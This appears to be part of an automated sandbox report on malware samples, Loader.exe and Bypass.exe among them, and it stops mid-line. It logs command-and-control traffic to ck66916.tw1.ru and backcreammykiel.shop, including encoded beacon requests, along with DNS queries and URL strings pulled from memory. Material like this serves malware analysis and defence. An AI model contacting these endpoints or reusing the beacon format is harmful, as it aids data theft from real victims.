Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru

Source: global traffic	DNS traffic detected: DNS query: backcreammykiel.shop
Source: global traffic	DNS traffic detected: DNS query: ck66916.tw1.ru
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: backcreammykiel.shop

Source: Loader.exe.0.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Loader.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Loader.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ck66916.tw1.ru
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ck66916.tw1.ru/
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000005C73000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005D8A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4119735415.0000000005C1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ck66916.tw1.ru/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13
Source: Loader.exe.0.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: Loader.exe.0.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Loader.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Loader.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Loader.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Loader.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Loader.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Loader.exe.0.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: Loader.exe.0.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: Bypass.exe, 0000000F.00000002.4119735415.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Loader.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: Loader.exe.0.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/
Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/B
Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/api
Source: RegAsm.exe, 0000000D.00000002.1976836408.000000000390D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/apiPK
Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/l
Source: RegAsm.exe, 0000000D.00000002.1946222478.00000000014DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/s
Source: RegAsm.exe, 0000000D.00000002.1976836408.000000000390D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop:443/api
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014EE2000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013624000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001407A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000139DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Bypass.exe, 0000000F.00000002.4158163083.000000001511D000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000132D3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000152F6000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.000000001414A000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013DAC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013203000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000012F32000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000144B3000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000146ED000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014C0F000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014CA7000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013D07000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000151EE000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.00000000136BC000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000015286000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014E10000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000014BBD000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 0000000F.00000002.4158163083.0000000013003000.00000004.00000800.00020000.00000000.sdmp, Bypass.exe, 